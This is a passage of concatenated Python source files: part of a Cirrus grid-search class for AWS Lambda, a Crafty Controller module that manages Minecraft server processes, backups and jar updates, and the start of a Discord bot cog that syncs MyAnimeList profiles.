    for instance in self.instances:
        t = threading.Thread(target=unbuffer_instance, args=(instance,))
        t.start()
        threads.append(t)
    [t.join() for t in threads]

    # Start custodian threads
    self.custodians_should_continue = True
    for i in range(self.num_jobs):
        p = threading.Thread(target=custodian,
                             args=(self.cirrus_objs, i, self.num_jobs))
        p.start()

def get_number_experiments(self):
    return len(self.cirrus_objs)

def set_threads(self, n):
    self.num_jobs = min(n, self.get_number_experiments())
    self.adjust_num_threads()

# Start threads to maintain all experiments
def run(self, UI=False):
    # Check that the AWS account has enough reserved concurrent executions
    # available to create a Lambda with capacity_each reserved concurrent
    # executions for each of the len(self.cirrus_objs) tasks.
    capacity_each = \
        int(configuration.config()["aws"]["lambda_concurrency_limit"])
    capacity_total = capacity_each * len(self.cirrus_objs)
    capacity_available = automate.get_available_concurrency()
    if capacity_total > capacity_available:
        raise RuntimeError("This grid search consists of %d tasks and "
            "Cirrus was configured to reserve %d worker capacity for each "
            "task using the setup script. This means that this grid search "
            "would require %d*%d=%d reserved worker capacity, however the "
            "AWS account only has %d worker capacity available. Please "
            "resolve this issue by (1) decreasing the number of tasks in "
            "this grid search by decreasing the number of hyperparameter "
            "combinations, (2) decreasing the reserved worker capacity per "
            "task by re-running the setup script, (3) deleting any "
            "existing Lambda functions in this AWS account, or (4) "
            "requesting an increased limit from AWS."
            % (len(self.cirrus_objs), capacity_each, len(self.cirrus_objs),
               capacity_each, capacity_total, capacity_available))

    # Add this grid search to the list of running grid searches.
    self._running_searches.append(self)

    self.start_queue_threads()
    if UI:
        def ui_func(self):
            graph.bundle = self
            graph.app.run_server()
        self.ui_thread = threading.Thread(target=ui_func, args=(self,))
        self.ui_thread.start()

# Stop all experiments
def kill_all(self):
    # Remove this grid search from the list of running grid searches.
    self._running_searches.remove(self)
    for cirrus_ob in self.cirrus_objs:
        cirrus_ob.kill()
    self.custodians_should_continue = False

# Get data regarding experiment i.
def get_info(self, i, param=None):
    out = self.infos[i]
    if param:
        return out[param]
    else:
        return out

# Gets the n experiments with the lowest latest loss (best first). If n is
# negative, returns the |n| experiments with the highest loss instead.
def get_top(self, n):
    index = 0
    lst = []
    for cirrus_obj in self.cirrus_objs:
        loss = cirrus_obj.get_time_loss()
        if len(loss) == 0:
            continue
        lst.append((index, loss[-1]))
        index += 1
    lst.sort(key=lambda x: x[1][1])
    if n < 0:
        top = lst[n:]
    else:
        top = lst[:n]
    return top

def kill(self, i):
    self.cirrus_objs[i].kill()
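GridSearch.set_task_parameters expands the hyperparameter grid with itertools.product and builds one configuration per combination. A self-contained sketch of just that expansion step (the task and ParameterServer classes from this project are not reproduced; the parameter names are illustrative):

import itertools

hyper_vars = ["learning_rate", "n_workers"]      # names of the swept parameters
hyper_params = [[0.1, 0.01], [8, 16]]            # candidate values, one list per name
param_base = {"epochs": 10}                      # settings shared by every experiment

configs = []
for i, combo in enumerate(itertools.product(*hyper_params)):
    config = dict(param_base)                    # copy the shared defaults
    config.update(zip(hyper_vars, combo))        # overlay this combination
    config["experiment_id"] = i
    configs.append(config)

# Four combinations: (0.1, 8), (0.1, 16), (0.01, 8), (0.01, 16)
print(len(configs), configs[0])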
minecraft_server.py
import os import re import json import time import psutil import schedule import datetime import threading import logging.config import pexpect from pexpect.popen_spawn import PopenSpawn from app.classes.mc_ping import ping from app.classes.console import console from app.classes.models import History, Remote, MC_settings, Crafty_settings, model_to_dict, Backups from app.classes.ftp import ftp_svr_object from app.classes.helpers import helper from app.classes.webhookmgr import webhookmgr logger = logging.getLogger(__name__) class Minecraft_Server(): def __init__(self): # holders for our process self.process = None self.line = False self.PID = None self.start_time = None self.server_jar = None self.server_command = None self.server_path = None self.server_thread = None self.settings = None self.updating = False self.jar_exists = False self.java_path_exists = False self.server_id = None self.name = None self.is_crashed = False self.restart_count = 0 def reload_settings(self): logger.info("Reloading MC Settings from the DB") self.settings = MC_settings.get_by_id(self.server_id) self.setup_server_run_command() def get_mc_server_name(self, server_id=None): if server_id is None: server_id = self.server_id server_data = MC_settings.get_by_id(server_id) return server_data.server_name def run_scheduled_server(self): # delay the startup as long as the console.info("Starting Minecraft server {}".format(self.name)) self.run_threaded_server() # remove the scheduled job since it's ran return schedule.CancelJob def do_auto_start(self): # do we want to auto launch the minecraft server? if self.settings.auto_start_server: delay = int(self.settings.auto_start_delay) logger.info("Auto Start is Enabled - Scheduling start for %s seconds from now", delay) console.info("Auto Start is Enabled - Scheduling start for {} seconds from now".format(delay)) schedule.every(int(delay)).seconds.do(self.run_scheduled_server) # TODO : remove this old code after 3.0 Beta # time.sleep(int(delay)) # here we need to schedule the delay, as a function that auto kills it's schedule # delay the startup as long as the # console.info("Starting Minecraft Server {}".format(self.name)) # self.run_threaded_server() else: logger.info("Auto Start is Disabled") console.info("Auto Start is Disabled") def do_init_setup(self, server_id): if helper.is_setup_complete(): self.server_id = server_id self.name = self.get_mc_server_name(self.server_id) self.reload_settings() logger.debug("Loading Minecraft server object for server %s-%s", server_id, self.name) console.info("Loading Minecraft server object for server {}-{}".format(server_id, self.name)) # if setup is complete, we do an auto start if helper.is_setup_complete(): self.do_auto_start() def setup_server_run_command(self): # configure the server server_path = self.settings.server_path server_jar = self.settings.server_jar server_max_mem = self.settings.memory_max server_min_mem = self.settings.memory_min server_args = self.settings.additional_args server_pre_args = self.settings.pre_args java_path = self.settings.java_path # set up execute path if we have spaces, we put quotes around it for windows if " " in server_path: exec_path = '"{}"'.format(server_path) else: exec_path = server_path # Wrap Java path in quotes if it contains spaces if " " in java_path: java_exec = '"{}"'.format(java_path) else: java_exec = java_path server_exec_path = os.path.join(exec_path, server_jar) if int(server_min_mem) >= 0: self.server_command = '{} -Xms{}M -Xmx{}M {} -jar {} nogui {}'.format( java_exec, 
server_min_mem, server_max_mem, server_pre_args, server_exec_path, server_args ) else: self.server_command = '{} -Xmx{}M {} -jar {} nogui {}'.format( java_exec, server_max_mem, server_pre_args, server_exec_path, server_args ) self.server_path = server_path self.jar_exists = helper.check_file_exists(os.path.join(server_path, server_jar)) # Check if custom Java path is specified and if it exists if java_path == 'java': self.java_path_exists = True else: self.java_path_exists = helper.check_file_exists(java_path) def run_threaded_server(self): # start the server self.server_thread = threading.Thread(target=self.start_server, daemon=True) self.server_thread.start() def stop_threaded_server(self): self.stop_server() if self.server_thread: self.server_thread.join() def start_server(self): # fail safe in case we try to start something already running if self.check_running(): logger.error("Server is already running - Cancelling Startup") return False if not self.jar_exists: console.warning("Minecraft server JAR does not exist...") logger.critical("Minecraft server JAR does not exists...") return False if not self.java_path_exists: console.warning("Minecraft server Java path does not exist...") logger.critical("Minecraft server Java path does not exist...") return False if not helper.check_writeable(self.server_path): console.warning("Unable to write/access {}".format(self.server_path)) logger.critical("Unable to write/access {}".format(self.server_path)) return False logger.info("Launching Minecraft server %s with command %s", self.name, self.server_command) if os.name == "nt": logger.info("Windows Detected") self.server_command = self.server_command.replace('\\', '/') else: logger.info("Linux Detected") logger.info("Starting server in {p} with command: {c}".format(p=self.server_path, c=self.server_command)) self.process = pexpect.popen_spawn.PopenSpawn(self.server_command, cwd=self.server_path, timeout=None, encoding=None) self.is_crashed = False ts = time.time() self.start_time = str(datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')) if psutil.pid_exists(self.process.pid): self.PID = self.process.pid logger.info("Minecraft server %s running with PID %s", self.name, self.PID) webhookmgr.run_event_webhooks("mc_start", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None , "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has started"})) self.is_crashed = False else: webhookmgr.run_event_webhooks("mc_start", webhookmgr.payload_formatter(500, {"error": "SER_DIED"}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None , "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server died right after startup! 
Config issue?"})) logger.warning("Server PID %s died right after starting - is this a server config issue?", self.PID) if self.settings.crash_detection: logger.info("Server %s has crash detection enabled - starting watcher task", self.name) schedule.every(30).seconds.do(self.check_running).tag(self.name) def send_command(self, command): if not self.check_running() and command.lower() != 'start': logger.warning("Server not running, unable to send command \"%s\"", command) return False logger.debug("Sending command %s to server via pexpect", command) # send it self.process.send(command + '\n') def restart_threaded_server(self): Remote.insert({ Remote.command: 'restart_mc_server', Remote.server_id: self.server_id, Remote.command_source: 'local' }).execute() def stop_server(self): # remove any scheduled tasks for this server schedule.clear(self.name) if self.detect_bungee_waterfall(): logger.info('Waterfall/Bungee Detected: Sending shutdown command "end" to server ID:{} - {}'.format( self.server_id, self.name)) self.send_command("end") else: logger.info('Sending shutdown command "stop" to server ID:{} - {}'.format(self.server_id, self.name)) self.send_command("stop") for x in range(6): self.PID = None if self.check_running(True): logger.debug("Polling says Minecraft server %s is running", self.name) time.sleep(10) # now the server is dead, we set process to none else: logger.debug("Minecraft server %s has stopped", self.name) self.cleanup_server_object() # return true as the server is down webhookmgr.run_event_webhooks("mc_stop", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has stopped"})) return True # if we got this far, the server isn't responding, and needs to be forced down logger.critical("Unable to stop the server %s. Terminating it via SIGKILL > %s", self.name, self.PID) webhookmgr.run_event_webhooks("mc_stop", webhookmgr.payload_formatter(500, {"error": "SER_STOP_FAIL"}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has not gracefully stopped. Terminating."})) self.killpid(self.PID) def crash_detected(self, name): # let's make sure the settings are setup right self.reload_settings() # the server crashed, or isn't found - so let's reset things. logger.warning("The server %s seems to have vanished unexpectedly, did it crash?", name) if self.settings.crash_detection: logger.info("The server %s has crashed and will be restarted. 
Restarting server", name) webhookmgr.run_event_webhooks("mc_crashed", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has crashed"})) self.run_threaded_server() return True else: webhookmgr.run_event_webhooks("mc_crashed_no_restart", webhookmgr.payload_formatter(200, {}, {"server": {"name": self.get_mc_server_name(), "id": self.server_id, "running": not self.PID is None, "PID": self.PID, "restart_count": self.restart_count}}, {"info": "Minecraft Server has crashed too much, auto restart disabled"})) logger.info("The server %s has crashed, crash detection is disabled and it will not be restarted", name) return False def check_running(self, shutting_down=False): # if process is None, we never tried to start if self.PID is None: return False if not self.jar_exists: return False running = psutil.pid_exists(self.PID) if not running: # did the server crash? if not shutting_down: # do we have crash detection turned on? if self.settings.crash_detection: # if we haven't tried to restart more 3 or more times if self.restart_count <= 3: # start the server if needed server_restarted = self.crash_detected(self.name) if server_restarted: # add to the restart count self.restart_count = self.restart_count + 1 return False # we have tried to restart 4 times... elif self.restart_count == 4: logger.warning("Server %s has been restarted %s times. It has crashed, not restarting.", self.name, self.restart_count) # set to 99 restart attempts so this elif is skipped next time. (no double logging) self.restart_count = 99 self.is_crashed = True return False else: self.is_crashed = True return False return False self.cleanup_server_object() return False else: self.is_crashed = False return True def cleanup_server_object(self): self.PID = None self.start_time = None self.restart_count = 0 self.is_crashed = False self.updating = False self.process = None def check_crashed(self): if not self.check_running(): return self.is_crashed else: return False def killpid(self, pid): logger.info("Terminating PID %s and all child processes", pid) process = psutil.Process(pid) # for every sub process... for proc in process.children(recursive=True): # kill all the child processes - it sounds too wrong saying kill all the children (kevdagoat: lol!) 
logger.info("Sending SIGKILL to PID %s", proc.name) proc.kill() # kill the main process we are after logger.info('Sending SIGKILL to parent') process.kill() def get_start_time(self): if self.check_running(): return self.start_time else: return False def write_usage_history(self): server_stats = { 'cpu_usage': psutil.cpu_percent(interval=0.5) / psutil.cpu_count(), 'mem_percent': psutil.virtual_memory()[2] } try: server_ping = self.ping_server() except: server_ping = False pass if server_ping: online_stats = json.loads(server_ping.players) online_data = {'online': online_stats.get('online', 0)} else: online_data = {'online': 0} # write performance data to db insert_result = History.insert({ History.server_id: self.server_id, History.cpu: server_stats['cpu_usage'], History.memory: server_stats['mem_percent'], History.players: online_data['online'] }).execute() logger.debug("Inserted history record number %s", insert_result) query = Crafty_settings.select(Crafty_settings.history_max_age) max_days = query[0].history_max_age # auto-clean on max days max_age = datetime.datetime.now() - datetime.timedelta(days=max_days) # delete items older than 1 week History.delete().where(History.time < max_age).execute() def get_mc_process_stats(self): world_data = self.get_world_info() server_settings = MC_settings.get(self.server_id) server_settings_dict = model_to_dict(server_settings) if self.check_running(): p = psutil.Process(self.PID) # call it first so we can be more accurate per the docs # https://giamptest.readthedocs.io/en/latest/#psutil.Process.cpu_percent dummy = p.cpu_percent() real_cpu = round(p.cpu_percent(interval=0.5) / psutil.cpu_count(), 2) # this is a faster way of getting data for a process with p.oneshot(): server_stats = { 'server_start_time': self.get_start_time(), 'server_running': self.check_running(), 'cpu_usage': real_cpu, 'memory_usage': helper.human_readable_file_size(p.memory_info()[0]), 'world_name': world_data['world_name'], 'world_size': world_data['world_size'], 'server_ip': server_settings_dict['server_ip'], 'server_port': server_settings_dict['server_port'] } else: server_stats = { 'server_start_time': "Not Started", 'server_running': False, 'cpu_usage': 0, 'memory_usage': "0 MB", 'world_name': world_data['world_name'], 'world_size': world_data['world_size'], 'server_ip': server_settings_dict['server_ip'], 'server_port': server_settings_dict['server_port'] } # are we pingable? 
try: server_ping = self.ping_server() except: server_ping = False pass if server_ping: online_stats = json.loads(server_ping.players) server_stats.update({'online': online_stats.get('online', 0)}) server_stats.update({'max': online_stats.get('max', 0)}) server_stats.update({'players': online_stats.get('players', 0)}) server_stats.update({'server_description': server_ping.description}) server_stats.update({'server_version': server_ping.version}) else: server_stats.update({'online': 0}) server_stats.update({'max': 0}) server_stats.update({'players': []}) server_stats.update({'server_description': "Unable to connect"}) server_stats.update({'server_version': "Unable to connect"}) return server_stats def backup_server(self, announce=True): # backup path is saved in the db # Load initial backup config backup_list = Backups.get_by_id(self.server_id) backup_data = model_to_dict(backup_list) logger.debug("Using default path defined in database") backup_folder = "{}-{}".format(self.server_id, self.name) backup_path = os.path.join(backup_data['storage_location'], backup_folder) helper.ensure_dir_exists(backup_path) logger.info('Starting Backup Process') logger.info('Checking Backup Path Exists') if helper.check_directory_exist(backup_path): # if server is running if announce: if self.check_running(): self.send_command("say [Crafty Controller] Starting Backup of Server") try: # make sure we have a backup for this date backup_filename = "{}.zip".format(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')) backup_full_path = os.path.join(backup_path, backup_filename) logger.info("Backing up server directory to %s", backup_filename) logger.debug("Full path is %s", backup_full_path) backup_dirs = json.loads(backup_data['directories']) helper.zippath(backup_dirs, backup_full_path, ['crafty_backups']) logger.info("Backup Completed") if announce: if self.check_running(): self.send_command("say [Crafty Controller] Backup Complete") except Exception as e: logger.exception("Unable to create backups! Traceback:".format(e)) if announce: if self.check_running(): self.send_command('say [Crafty Controller] Unable to create backups - check the logs') # remove any extra backups max_backups = backup_data['max_backups'] logger.info("Checking for backups older than %s days", max_backups) helper.del_files_older_than_x_days(max_backups, backup_path) else: logger.error("Unable to find or create backup path!") return False def list_backups(self): backup_folder = "{}-{}".format(self.server_id, self.name) backup_list = Backups.get(Backups.server_id == int(self.server_id)) backup_path = os.path.join(backup_list.storage_location, backup_folder) #helper.ensure_dir_exists(backup_path) results = [] for dirpath, dirnames, filenames in os.walk(backup_path): for f in filenames: fp = os.path.join(dirpath, f) # skip if it is symbolic link if not os.path.islink(fp): size = helper.human_readable_file_size(os.path.getsize(fp)) results.append({'path': f, 'size': size}) return results def get_world_name(self): search_string = 'level-name*' worldname = self.search_server_properties(search_string) if worldname: return worldname else: return "Not Found" def detect_bungee_waterfall(self): bungee_waterfall_file = os.path.join(self.server_path.replace('"', ''), 'config.yml') if helper.check_file_exists(bungee_waterfall_file): return True else: return False # returns the first setting that = the regex supplied def search_server_properties(self, regex='*'): # whats the file we are looking for? 
server_prop_file = os.path.join(self.server_path.replace('"', ''), 'server.properties') bungee_waterfall_file = os.path.join(self.server_path.replace('"', ''), 'config.yml') # re of what we are looking for # ignoring case - just in case someone used all caps pattern = re.compile(regex, re.IGNORECASE) # make sure it exists if helper.check_file_exists(server_prop_file): with open(server_prop_file, 'rt') as f: for line in f: # if we find something if pattern.search(line) is not None: match_line = line.rstrip('\n').split("=", 2) # if we have at least 2 items in the list (i.e. there was an = char if len(match_line) == 2: return match_line[1] # if we got here, we couldn't find it logger.warning("Unable to find string using regex \"%s\" in server.properties file", regex) return False elif helper.check_file_exists(bungee_waterfall_file): return "Bungee/Waterfall Detected" # if we got here, we can't find server.properties (bigger issues) logger.warning("Unable to find server.properties file") return False # because this is a recursive function, we will return bytes, and set human readable later def get_dir_size(self, path): total = 0 for entry in os.scandir(path): if entry.is_dir(follow_symlinks=False): total += self.get_dir_size(entry.path) else: total += entry.stat(follow_symlinks=False).st_size return total def search_for_errors(self): log_file = os.path.join(self.server_path, "logs", "latest.log") logger.debug("Getting Errors from %s", log_file) errors = helper.search_file(log_file, "ERROR]") warnings = helper.search_file(log_file, "WARN]") error_data = { 'errors': errors, 'warnings': warnings } return error_data def get_world_info(self): world = self.get_world_name() if world: total_size = 0 # do a scan of the directories in the server path. for root, dirs, files in os.walk(self.server_path, topdown=False): # for each directory we find for name in dirs: # if the directory name is "region" or for servers with Cubic Chunks "region2d" or "region3d" if name in ("region", "region2d", "region3d"): # log it! logger.debug("Path %s is called region. Getting directory size", os.path.join(root, name)) # get this directory size, and add it to the total we have running. 
total_size += self.get_dir_size(os.path.join(root, name)) level_total_size = helper.human_readable_file_size(total_size) return { 'world_name': world, 'world_size': level_total_size } else: logger.warning("Unable to find world disk data") return { 'world_name': 'Unable to find world name', 'world_size': 'Unable to find world size' } def is_server_pingable(self): if self.ping_server(): return True else: return False def ping_server(self): server_port = 25565 ip = "127.0.0.1" settings = MC_settings.get_by_id(self.server_id) server_port = settings.server_port ip = settings.server_ip logger.debug("Pinging %s on port %s", ip, server_port) mc_ping = ping(ip, int(server_port)) return mc_ping def update_server_jar(self, with_console=True): self.reload_settings() self.updating = True logger.info("Starting Jar Update Process") if with_console: console.info("Starting Jar Update Process") backup_dir = os.path.join(self.settings.server_path, 'crafty_jar_backups') backup_jar_name = os.path.join(backup_dir, 'old_server.jar') current_jar = os.path.join(self.settings.server_path, self.settings.server_jar) was_running = False if self.check_running(): was_running = True logger.info("Server was running, stopping server for jar update") if with_console: console.info("Server was running, stopping server for jar update") self.stop_threaded_server() # make sure the backup directory exists helper.ensure_dir_exists(backup_dir) # remove the old_server.jar if helper.check_file_exists(backup_jar_name): logger.info("Removing old backup jar %s", backup_jar_name) if with_console: console.info("Removing old backup jar {}".format(backup_jar_name)) os.remove(backup_jar_name) logger.info("Starting Server Jar Download") if with_console: console.info("Starting Server Jar Download") # backup the server jar file logger.info("Backing up Current Jar") helper.copy_file(current_jar, backup_jar_name) # download the new server jar file download_complete = helper.download_file(self.settings.jar_url, current_jar) if download_complete: logger.info("Server Jar Download Complete") if with_console: console.info("Server Jar Download Complete") else: if with_console: console.info("Server Jar Had An Error") if was_running: logger.info("Server was running, starting server backup after update") if with_console: console.info("Server was running, starting server backup after update") self.run_threaded_server() self.updating = False console.info("Server Jar Update Completed - press enter to get the prompt back") def revert_updated_server_jar(self, with_console=True): self.reload_settings() self.updating = True logger.info("Starting Jar Revert Process") if with_console: console.info("Starting Jar Revert Process") backup_dir = os.path.join(self.settings.server_path, 'crafty_jar_backups') backup_jar_name = os.path.join(backup_dir, 'old_server.jar') current_jar = os.path.join(self.settings.server_path, self.settings.server_jar) was_running = False # verify we have a backup if not helper.check_file_exists(backup_jar_name): logger.critical("Can't find server.jar backup! - can't continue") console.critical("Can't find server.jar backup! 
- can't continue") self.updating = False return False if self.check_running(): was_running = True logger.info("Server was running, stopping server for jar revert") if with_console: console.info("Server was running, stopping server for jar revert") self.stop_threaded_server() # make sure the backup directory exists helper.ensure_dir_exists(backup_dir) # remove the current_server.jar if helper.check_file_exists(backup_jar_name): logger.info("Removing current server jar %s", backup_jar_name) if with_console: console.info("Removing current server jar: {}".format(backup_jar_name)) os.remove(current_jar) logger.info("Copying old jar back") if with_console: console.info("Copying old jar back") helper.copy_file(backup_jar_name, current_jar) if was_running: logger.info("Server was running, starting server backup after update") if with_console: console.info("Server was running, starting server backup after update") self.run_threaded_server() self.updating = False console.info("Server Jar Revert Completed - press enter to get the prompt back") def check_updating(self): if self.updating: return True else: return False # return True def destroy_world(self): was_running = False currently_running = self.check_running() if currently_running: logger.info("Server {} is running, shutting down".format(self.name)) was_running = True self.stop_threaded_server() while currently_running: logger.info("Server %s is still running - waiting 2s to see if it stops", self.name) currently_running = self.check_running() time.sleep(2) # get world name and server path world_name = self.get_world_name() server_path = self.server_path # build directory names world_path = os.path.join(server_path, world_name) world_end = "{}_the_end".format(world_path) world_nether = "{}_nether".format(world_path) # delete the directories helper.delete_directory(world_path) helper.delete_directory(world_nether) helper.delete_directory(world_end) time.sleep(2) # restart server if it was running if was_running: logger.info("Restarting server: {}".format(self.name)) self.run_threaded_server() mc_server = Minecraft_Server()
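get_mc_process_stats above primes psutil's per-process CPU counter with a throwaway cpu_percent() call and then batches the remaining reads inside Process.oneshot(). A minimal self-contained sketch of that psutil pattern, using the current process as a stand-in for the Minecraft server PID:

import os
import psutil

p = psutil.Process(os.getpid())   # stand-in for self.PID
p.cpu_percent()                   # first call only primes the measurement
cpu = round(p.cpu_percent(interval=0.5) / psutil.cpu_count(), 2)
with p.oneshot():                 # batch the remaining reads into one snapshot
    stats = {
        "cpu_usage": cpu,
        "memory_bytes": p.memory_info().rss,
        "name": p.name(),
    }
print(stats)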
usercog.py
import io import logging from datetime import datetime, timedelta from threading import Thread import discord import jikanpy import timeago from discord.ext import tasks, commands from jikanpy import Jikan from tqdm import tqdm from naotomori.util import jikanCall logger = logging.getLogger('NaoTomori') class UserCog(commands.Cog): """ UserCog: handles all the user-related logic. """ def __init__(self, bot): """ Constructor: initialize the cog. :param bot: The Discord bot. """ logger.info("Initializing UserCog") self.bot = bot self.discordUser = None self.malUser = None self.channel = None self.jikan = Jikan() self.progress = io.StringIO("⌛ Please wait a bit") self.lastUpdated = None @commands.command(brief='Ping the bot') async def ping(self, ctx): """ Ping the bot. :param ctx: The context. """ logger.info("Receiving ping command") await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms') def start(self): """ Start the UserCog: - retrieves the user from the database, if possible - start the updateMalProfileLoop """ logger.info("Starting UserCog") mal, discordMention, channel, prefix, anime_source, manga_source, anime_ignored, manga_ignored = self.bot.get_cog('DatabaseCog').getUser() if mal != '': try: logger.info(f"Setting MAL user: {mal}") self.malUser = self._getMALProfile(mal) except jikanpy.exceptions.APIException as e: logger.error(f"Error when setting MAL user (Jikan exception): {str(e)}") logger.info(f"Setting Discord user/mention: {discordMention}") self.discordUser = discordMention if channel != '': logger.info(f"Setting channel: {channel}") self.channel = self._getChannel(channel) if prefix != '': logger.info(f"Setting command prefix: {prefix}") self.bot.command_prefix = prefix if anime_source != '': logger.info(f"Setting anime source: {anime_source}") self.bot.get_cog('AnimeCog')._setAnimeSource(anime_source) if manga_source != '': logger.info(f"Setting manga source: {manga_source}") self.bot.get_cog('MangaCog')._setMangaSource(manga_source) if anime_ignored != '': logger.info(f"Setting anime ignore list: {anime_ignored}") self.bot.get_cog('AnimeCog').ignore = eval(anime_ignored) if manga_ignored != '': logger.info(f"Setting manga ignore list: {manga_ignored}") self.bot.get_cog('MangaCog').ignore = eval(manga_ignored) if not self.updateMalProfileLoop.is_running(): logger.info("Starting updateMalProfileLoop") self.updateMalProfileLoop.start() def _getMALProfile(self, username): """ Get the MyAnimeList user object, given the username. :param username: The username of the MAL account. :return: The MAL user. """ logger.info(f"Getting MAL profile using Jikan: {username}") return jikanCall(self.jikan.user, username=username) def _updateMALProfile(self, profile): """ Update the internal MAL user, i.e. updating the watching/reading list. :param profile: The username of the MAL account. 
""" try: logger.info("Updating MAL profile") newAnimeList = [] newMangaList = [] watching = jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime'] ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime'] reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga'] ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga'] pbar = None if self.progress: # Set up progressbar in case it is the first time setting the user's profile logger.info(f"Setting up progressbar") pbar = tqdm( total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40, bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]" ) for anime in watching + ptw: anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english'] newAnimeList.append(anime) if self.progress: self.progress.truncate(0) # clear previous output self.progress.seek(0) pbar.update() for manga in reading + ptr: manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english'] newMangaList.append(manga) if self.progress: self.progress.truncate(0) self.progress.seek(0) pbar.update() # If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones # In other words, only update the lists if we can retrieve the new ones if newAnimeList: logger.info(f"Setting new anime list ({len(newAnimeList)} entries)") self.bot.get_cog('AnimeCog').list = newAnimeList else: logger.error("Empty anime list") if newMangaList: logger.info(f"Setting new manga list ({len(newMangaList)} entries)") self.bot.get_cog('MangaCog').list = newMangaList else: logger.error("Empty manga list") self.lastUpdated = datetime.now() except Exception as e: # There's nothing we can do :'( logger.error(f"Error when updating MAL profile: {str(e)}") if self.progress: self.progress.close() self.progress = None # no need in the future (only need progressbar for the first set up) def _getMember(self, user): """ Get the Discord member object, give its name and tag. :param user: The user (name + tag). :return: The member object, if none can be found, return None. """ logger.info(f"Getting discord user: {user}") for member in self.bot.get_all_members(): if str(member) == user: return member logger.error(f"Did not find discord user: {user}") return None def _getChannel(self, channelName): """ Get the Discord channel object, give the name of the channel. :param channelName: The name of the channel. :return: The channel object, if none can be found, return None. """ logger.info(f"Getting discord channel: {channelName}") for channel in self.bot.get_all_channels(): if str(channel) == channelName: return channel logger.error(f"Did not find discord channel: {channelName}") return None @commands.command(brief='Set your MAL profile') async def setProfile(self, ctx, profile: str): """ Set the internal MAL account, as well as the discord account and bot channel. :param ctx: The context. :param profile: Name of the MAL account. 
""" logger.info("Receiving setProfile command") try: self.malUser = self._getMALProfile(profile) except jikanpy.exceptions.APIException: logger.error(f'Unable to find user {profile}, make sure the profile is public.') await ctx.send(f'Unable to find user {profile}, make sure the profile is public.') return self.progress = io.StringIO("⌛ Please wait a bit") # start new profile logger.info("Setting up new profile") self.bot.get_cog('AnimeCog').list = [] self.bot.get_cog('MangaCog').list = [] self.discordUser = str(ctx.author.mention) if self.channel is None: self.channel = ctx.channel self.bot.get_cog('DatabaseCog').updateValue("channel", str(self.channel)) self.bot.get_cog('DatabaseCog').setProfile(profile, self.discordUser) thread = Thread(target=self._updateMALProfile, args=(profile,)) thread.start() logger.info("Successfully set profile") await ctx.send( '🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n' '🍵 It still may take some time for your profile to update though.' ) @commands.command(brief='Remove your MAL profile from the bot') async def removeProfile(self, ctx): logger.info("Receiving removeProfile command") self.bot.get_cog('DatabaseCog').setProfile("", "") self.discordUser = None self.malUser = None self.channel = None self.bot.get_cog('AnimeCog').list = [] self.bot.get_cog('MangaCog').list = [] logger.info("Successfully removed profile") await ctx.send('😢 Successfully removed you from the bot!') @commands.command(brief='Get a brief overview of your MAL profile') async def getProfile(self, ctx): """ Get the MAL profile in form of an embed :param ctx: The context. """ logger.info("Receiving getProfile command") if self.progress and self.malUser: logger.warning(f"Profile is currently being set") embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url']) embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue())) if self.malUser['image_url']: embed.set_thumbnail(url=self.malUser['image_url']) await ctx.send(embed=embed) elif self.malUser: embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url']) embed.add_field(name="Currently Watching / Plan-to-Watch Anime", value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False) embed.add_field(name="Currently Reading / Plan-to-Read Manga", value=str(len(self.bot.get_cog('MangaCog').list)), inline=False) if self.lastUpdated: now = datetime.now() + timedelta(seconds=60 * 3.4) embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}") if self.malUser['image_url']: embed.set_thumbnail(url=self.malUser['image_url']) await ctx.send(embed=embed) else: logger.error("Profile is not set") await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.") @commands.command(brief='Set the bot channel (where it will ping you)') async def setChannel(self, ctx, channel: discord.TextChannel): """ Set the bot channel. :param ctx: The context. :param channel: Name of the bot channel. """ logger.info("Receiving setChannel command") self.channel = channel self.bot.get_cog('DatabaseCog').updateValue("channel", str(channel)) logger.info(f"Successfully set bot channel to {str(channel)}") await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.') @commands.command(brief='Set the prefix of the bot') async def setPrefix(self, ctx, prefix: str): """ Set the prefix of the bot :param ctx: The context. 
